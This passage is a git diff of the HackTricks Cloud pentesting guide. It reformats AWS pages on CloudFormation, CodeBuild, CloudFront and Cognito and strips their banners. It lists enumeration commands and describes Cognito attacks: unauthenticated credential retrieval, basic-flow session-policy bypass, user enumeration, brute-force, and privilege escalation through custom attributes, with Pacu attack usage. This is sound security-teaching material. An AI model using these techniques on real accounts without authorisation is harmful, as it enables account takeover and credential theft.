-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -71,17 +58,4 @@ TODO TODO -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md new file mode 100644 index 000000000..75fd48594 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md 
@@ -0,0 +1,75 @@ +# AWS - CloudFormation & Codestar Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## CloudFormation + +AWS CloudFormation is a service designed to **streamline the management of AWS resources**. It enables users to focus more on their applications running in AWS by **minimizing the time spent on resource management**. The core feature of this service is the **template**—a descriptive model of the desired AWS resources. Once this template is provided, CloudFormation is responsible for the **provisioning and configuration** of the specified resources. This automation facilitates a more efficient and error-free management of AWS infrastructure. + +### Enumeration + +```bash +# Stacks +aws cloudformation list-stacks +aws cloudformation describe-stacks # You could find sensitive information here +aws cloudformation list-stack-resources --stack-name +aws cloudformation get-template --stack-name cloudformationStack +aws cloudformation describe-stack-events --stack-name cloudformationStack + +## Show params and outputs +aws cloudformation describe-stacks | jq ".Stacks[] | .StackId, .StackName, .Parameters, .Outputs" + +# Export +aws cloudformation list-exports +aws cloudformation list-imports --export-name + +# Stack Sets +aws cloudformation list-stack-sets +aws cloudformation describe-stack-set --stack-set-name +aws cloudformation list-stack-instances --stack-set-name +aws cloudformation list-stack-set-operations --stack-set-name +aws cloudformation list-stack-set-operation-results --stack-set-name --operation-id +``` + +### Privesc + +In the following page you can check how to **abuse cloudformation permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/aws-cloudformation-privesc/ +{{#endref}} + +### Post-Exploitation + +Check for **secrets** or sensitive information in the **template, parameters & output** of each CloudFormation + +## Codestar + +AWS CodeStar is a service for creating, managing, and working with 
software development projects on AWS. You can quickly develop, build, and deploy applications on AWS with an AWS CodeStar project. An AWS CodeStar project creates and **integrates AWS services** for your project development toolchain. Depending on your choice of AWS CodeStar project template, that toolchain might include source control, build, deployment, virtual servers or serverless resources, and more. AWS CodeStar also **manages the permissions required for project users** (called team members). + +### Enumeration + +```bash +# Get projects information +aws codestar list-projects +aws codestar describe-project --id +aws codestar list-resources --project-id +aws codestar list-team-members --project-id + + aws codestar list-user-profiles + aws codestar describe-user-profile --user-arn +``` + +### Privesc + +In the following page you can check how to **abuse codestar permissions to escalate privileges**: + +{{#ref}} +../aws-privilege-escalation/aws-codestar-privesc/ +{{#endref}} + +## References + +- [https://docs.aws.amazon.com/cloudformation/](https://docs.aws.amazon.com/cloudformation/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md new file mode 100644 index 000000000..4a42986f4 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudfront-enum.md 
@@ -0,0 +1,44 @@
+# AWS - CloudFront Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## CloudFront
+
+CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When you use a request content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location which provides it the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself, however, as the logs are stored in S3 you will be stored for the storage used by S3.
+
+The log files capture data over a period of time and depending on the amount of requests that are received by Amazon CloudFront for that distribution will depend on the amount of log fils that are generated. It's important to know that these log files are not created or written to on S3. S3 is simply where they are delivered to once the log file is full. **Amazon CloudFront retains these logs until they are ready to be delivered to S3**. Again, depending on the size of these log files this delivery can take **between one and 24 hours**.
+
+**By default cookie logging is disabled** but you can enable it.
+
+### Functions
+
+You can create functions in CloudFront. These functions will have its **endpoint in cloudfront** defined and will run a declared **NodeJS code**. This code will run inside a **sandbox** in a machine running under an AWS managed machine (you would need a sandbox bypass to manage to escape to the underlaying OS).
+
+As the functions aren't run in the users AWS account. no IAM role is attached so no direct privesc is possible abusing this feature.
+
+### Enumeration
+
+```bash
+aws cloudfront list-distributions
+aws cloudfront get-distribution --id # Just get 1
+aws cloudfront get-distribution-config --id
+
+aws cloudfront list-functions
+aws cloudfront get-function --name TestFunction function_code.js
+
+aws cloudfront list-distributions | jq ".DistributionList.Items[] | .Id, .Origins.Items[].Id, .Origins.Items[].DomainName, .AliasICPRecordals[].CNAME"
+```
+
+## Unauthenticated Access
+
+{{#ref}}
+../aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md
+{{#endref}}
+
+## Post Exploitation
+
+{{#ref}}
+../aws-post-exploitation/aws-cloudfront-post-exploitation.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
similarity index 78%
rename from pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
rename to src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
index 91f30bd3e..9699f755d 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md
@@ -1,19 +1,6 @@
 # AWS - CloudHSM Enum
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## HSM - Hardware Security Module @@ -77,17 +64,4 @@ Overall, the high level of security provided by HSMs makes it **very difficult t TODO ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md new file mode 100644 index 000000000..ea2e36e55 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-codebuild-enum.md 
@@ -0,0 +1,76 @@
+# AWS - Codebuild Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## CodeBuild
+
+AWS **CodeBuild** is recognized as a **fully managed continuous integration service**. The primary purpose of this service is to automate the sequence of compiling source code, executing tests, and packaging the software for deployment purposes. The predominant benefit offered by CodeBuild lies in its ability to alleviate the need for users to provision, manage, and scale their build servers. This convenience is because the service itself manages these tasks. Essential features of AWS CodeBuild encompass:
+
+1. **Managed Service**: CodeBuild manages and scales the build servers, freeing users from server maintenance.
+2. **Continuous Integration**: It integrates with the development and deployment workflow, automating the build and test phases of the software release process.
+3. **Package Production**: After the build and test phases, it prepares the software packages, making them ready for deployment.
+
+AWS CodeBuild seamlessly integrates with other AWS services, enhancing the CI/CD (Continuous Integration/Continuous Deployment) pipeline's efficiency and reliability.
+
+### **Github/Gitlab/Bitbucket Credentials**
+
+#### **Default source credentials**
+
+This is the legacy option where it's possible to configure some **access** (like a Github token or app) that will be **shared across codebuild projects** so all the projects can use this configured set of credentials.
+
+The stored credentials (tokens, passwords...) are **managed by codebuild** and there isn't any public way to retrieve them from AWS APIs.
+
+#### Custom source credential
+
+Depending on the repository platform (Github, Gitlab and Bitbucket) different options are provided. But in general, any option that requires to **store a token or a password will store it as a secret in the secrets manager**.
+
+This allows **different codebuild projects to use different configured accesses** to the providers instead of just using the configured default one.
+
+### Enumeration
+
+```bash
+# List external repo creds (such as github tokens)
+## It doesn't return the token but just the ARN where it's located
+aws codebuild list-source-credentials
+
+# Projects
+aws codebuild list-shared-projects
+aws codebuild list-projects
+aws codebuild batch-get-projects --names # Check for creds in env vars
+
+# Builds
+aws codebuild list-builds
+aws codebuild list-builds-for-project --project-name
+aws codebuild list-build-batches
+aws codebuild list-build-batches-for-project --project-name
+
+# Reports
+aws codebuild list-reports
+aws codebuild describe-test-cases --report-arn
+```
+
+### Privesc
+
+In the following page, you can check how to **abuse codebuild permissions to escalate privileges**:
+
+{{#ref}}
+../aws-privilege-escalation/aws-codebuild-privesc.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../aws-post-exploitation/aws-codebuild-post-exploitation/
+{{#endref}}
+
+### Unauthenticated Access
+
+{{#ref}}
+../aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md
+{{#endref}}
+
+## References
+
+- [https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html](https://docs.aws.amazon.com/managedservices/latest/userguide/code-build.html)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
new file mode 100644
index 000000000..581b457be
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/README.md
@@ -0,0 +1,102 @@ +# AWS - Cognito Enum + +{{#include ../../../../banners/hacktricks-training.md}} + +## Cognito + +Amazon Cognito is utilized for **authentication, authorization, and user management** in web and mobile applications. It allows users the flexibility to sign in either directly using a **user name and password** or indirectly through a **third party**, including Facebook, Amazon, Google, or Apple. + +Central to Amazon Cognito are two primary components: + +1. **User Pools**: These are directories designed for your app users, offering **sign-up and sign-in functionalities**. +2. **Identity Pools**: These pools are instrumental in **authorizing users to access different AWS services**. They are not directly involved in the sign-in or sign-up process but are crucial for resource access post-authentication. + +### **User pools** + +To learn what is a **Cognito User Pool check**: + +{{#ref}} +cognito-user-pools.md +{{#endref}} + +### **Identity pools** + +The learn what is a **Cognito Identity Pool check**: + +{{#ref}} +cognito-identity-pools.md +{{#endref}} + +## Enumeration + +```bash +# List Identity Pools +aws cognito-identity list-identity-pools --max-results 60 +aws cognito-identity describe-identity-pool --identity-pool-id "eu-west-2:38b294756-2578-8246-9074-5367fc9f5367" +aws cognito-identity list-identities --identity-pool-id --max-results 60 +aws cognito-identity get-identity-pool-roles --identity-pool-id + +# Identities Datasets +## Get dataset of identity id (inside identity pool) +aws cognito-sync list-datasets --identity-pool-id --identity-id +## Get info of the dataset +aws cognito-sync describe-dataset --identity-pool-id --identity-id --dataset-name +## Get dataset records +aws cognito-sync list-records --identity-pool-id --identity-id --dataset-name + +# User Pools +## Get pools +aws cognito-idp list-user-pools --max-results 60 + +## Get users +aws cognito-idp list-users --user-pool-id + +## Get groups +aws cognito-idp list-groups 
--user-pool-id + +## Get users in a group +aws cognito-idp list-users-in-group --user-pool-id --group-name + +## List App IDs of a user pool +aws cognito-idp list-user-pool-clients --user-pool-id + +## List configured identity providers for a user pool +aws cognito-idp list-identity-providers --user-pool-id + +## List user import jobs +aws cognito-idp list-user-import-jobs --user-pool-id --max-results 60 + +## Get MFA config of a user pool +aws cognito-idp get-user-pool-mfa-config --user-pool-id + +## Get risk configuration +aws cognito-idp describe-risk-configuration --user-pool-id +``` + +### Identity Pools - Unauthenticated Enumeration + +Just **knowing the Identity Pool ID** you might be able **get credentials of the role associated to unauthenticated** users (if any). [**Check how here**](cognito-identity-pools.md#accessing-iam-roles). + +### User Pools - Unauthenticated Enumeration + +Even if you **don't know a valid username** inside Cognito, you might be able to **enumerate** valid **usernames**, **BF** the **passwords** of even **register a new user** just **knowing the App client ID** (which is usually found in source code). [**Check how here**](cognito-user-pools.md#registration)**.** + +## Privesc + +{{#ref}} +../../aws-privilege-escalation/aws-cognito-privesc.md +{{#endref}} + +## Unauthenticated Access + +{{#ref}} +../../aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md +{{#endref}} + +## Persistence + +{{#ref}} +../../aws-persistence/aws-cognito-persistence.md +{{#endref}} + +{{#include ../../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md similarity index 63% rename from pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md rename to src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md index 0ed8cb022..14d5f806a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-identity-pools.md @@ -1,29 +1,16 @@ # Cognito Identity Pools -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information Identity pools serve a crucial role by enabling your users to **acquire temporary credentials**. These credentials are essential for accessing various AWS services, including but not limited to Amazon S3 and DynamoDB. A notable feature of identity pools is their support for both anonymous guest users and a range of identity providers for user authentication. The supported identity providers include: -* Amazon Cognito user pools -* Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple -* Providers compliant with OpenID Connect (OIDC) -* SAML (Security Assertion Markup Language) identity providers -* Developer authenticated identities +- Amazon Cognito user pools +- Social sign-in options such as Facebook, Google, Login with Amazon, and Sign in with Apple +- Providers compliant with OpenID Connect (OIDC) +- SAML (Security Assertion Markup Language) identity providers +- Developer authenticated identities ```python # Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows: 
@@ -58,7 +45,7 @@ Moreover, the service **cognito-sync** is the service that allow to **manage and ### Tools for pentesting -* [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. @@ -67,8 +54,8 @@ For a description of the modules' functions see part 2 of the [blog post](https: Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: ```bash -Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools -us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` 
@@ -78,7 +65,7 @@ Sample cognito\_\_enum usage to gather all user pools, user pool clients, identi Pacu (new:test) > run cognito__enum ``` -* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation. +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and identity pool escalation. #### Installation @@ -100,9 +87,8 @@ For more information check https://github.com/padok-team/cognito-scanner The only thing an attacker need to know to **get AWS credentials** in a Cognito app as unauthenticated user is the **Identity Pool ID**, and this **ID must be hardcoded** in the web/mobile **application** for it to use it. An ID looks like this: `eu-west-1:098e5341-8364-038d-16de-1865e435da3b` (it's not bruteforceable). -{% hint style="success" %} -The **IAM Cognito unathenticated role created via is called** by default `Cognito_Unauth_Role` -{% endhint %} +> [!TIP] +> The **IAM Cognito unathenticated role created via is called** by default `Cognito_Unauth_Role` If you find an Identity Pools ID hardcoded and it allows unauthenticated users, you can get AWS credentials with: @@ -139,9 +125,8 @@ aws cognito-identity get-id --identity-pool-id --no-sign aws cognito-identity get-credentials-for-identity --identity-id --no-sign ``` -{% hint style="warning" %} -Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section. -{% endhint %} +> [!WARNING] +> Note that by default an unauthenticated cognito **user CANNOT have any permission, even if it was assigned via a policy**. Check the followin section. ### Enhanced vs Basic Authentication flow 
@@ -149,7 +134,6 @@ The previous section followed the **default enhanced authentication flow**. This However, there is a way to bypass this, if the **Identity pool has "Basic (Classic) Flow" enabled**, the user will be able to obtain a session using that flow which **won't have that restrictive session policy**. -{% code overflow="wrap" %} ```bash # Get auth ID aws cognito-identity get-id --identity-pool-id --no-sign 
@@ -161,29 +145,25 @@ aws cognito-identity get-open-id-token --identity-id --no-sign ## If you don't know the role_arn use the previous enhanced flow to get it aws sts assume-role-with-web-identity --role-arn "arn:aws:iam:::role/" --role-session-name sessionname --web-identity-token --no-sign ``` -{% endcode %} -{% hint style="warning" %} -If you receive this **error**, it's because the **basic flow is not enabled (default)** +> [!WARNING] +> If you receive this **error**, it's because the **basic flow is not enabled (default)** -`An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.` -{% endhint %} +> `An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.` Having a set of IAM credentials you should check [which access you have](../../#whoami) and try to [escalate privileges](../../aws-privilege-escalation/). ### Authenticated -{% hint style="info" %} -Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials. -{% endhint %} +> [!NOTE] +> Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials. There could also be **roles** available for **authenticated users accessing the Identity Poo**l. For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**. 
-{% hint style="success" %} -The **IAM Cognito athenticated role created via is called** by default `Cognito_Auth_Role` -{% endhint %} +> [!TIP] +> The **IAM Cognito athenticated role created via is called** by default `Cognito_Auth_Role` Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured). @@ -205,21 +185,7 @@ aws cognito-identity get-credentials-for-identity \ --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
-{% hint style="warning" %} -It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**. -{% endhint %} +> [!WARNING] +> It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md similarity index 70% rename from pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md rename to src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md index d0229cf86..471d04789 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md @@ -1,19 +1,6 @@ # Cognito User Pools -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information 
@@ -21,24 +8,24 @@ A user pool is a user directory in Amazon Cognito. With a user pool, your users User pools provide: -* Sign-up and sign-in services. -* A built-in, customizable web UI to sign in users. -* Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. -* User directory management and user profiles. -* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. -* Customized workflows and user migration through AWS Lambda triggers. +- Sign-up and sign-in services. +- A built-in, customizable web UI to sign in users. +- Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool. +- User directory management and user profiles. +- Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification. +- Customized workflows and user migration through AWS Lambda triggers. **Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool. ### Potential attacks -* **Registration**: By default a user can register himself, so he could create a user for himself. -* **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack. -* **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**. +- **Registration**: By default a user can register himself, so he could create a user for himself. 
+- **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack. +- **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**. ### Tools for pentesting -* [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\ +- [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\ For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. ```bash 
@@ -46,12 +33,12 @@ User pools provide: Pacu (new:test) > run cognito__enum # cognito__attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: -Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools -us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` -* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info. +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info. ```bash # Install @@ -60,10 +47,10 @@ pip install cognito-scanner cognito-scanner --help ``` -* [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users. +- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users. ```bash -python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl +python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl ``` ## Registration 
@@ -96,10 +83,9 @@ You could use this functionality also to **enumerate existing users.** This is t An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists ``` -{% hint style="info" %} -Note in the previous command how the **custom attributes start with "custom:"**.\ -Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**. -{% endhint %} +> [!NOTE] +> Note in the previous command how the **custom attributes start with "custom:"**.\ +> Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**. Or just to test if a client id exists. This is the error if the client-id doesn't exist: @@ -125,9 +111,8 @@ aws cognito-idp confirm-sign-up --client-id \ --no-sign-request --region us-east-1 ``` -{% hint style="warning" %} -Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**. -{% endhint %} +> [!WARNING] +> Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**. ### Privilege Escalation / Updating Attributes 
@@ -142,20 +127,18 @@ aws cognito-idp update-user-attributes \ #### Custom attribute privesc -{% hint style="danger" %} -You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself! -{% endhint %} +> [!CAUTION] +> You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself! #### Email/username modification privesc You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again). -{% hint style="warning" %} -You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\ -Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**. +> [!WARNING] +> You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\ +> Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**. -Moreover, note that you can put anything inside 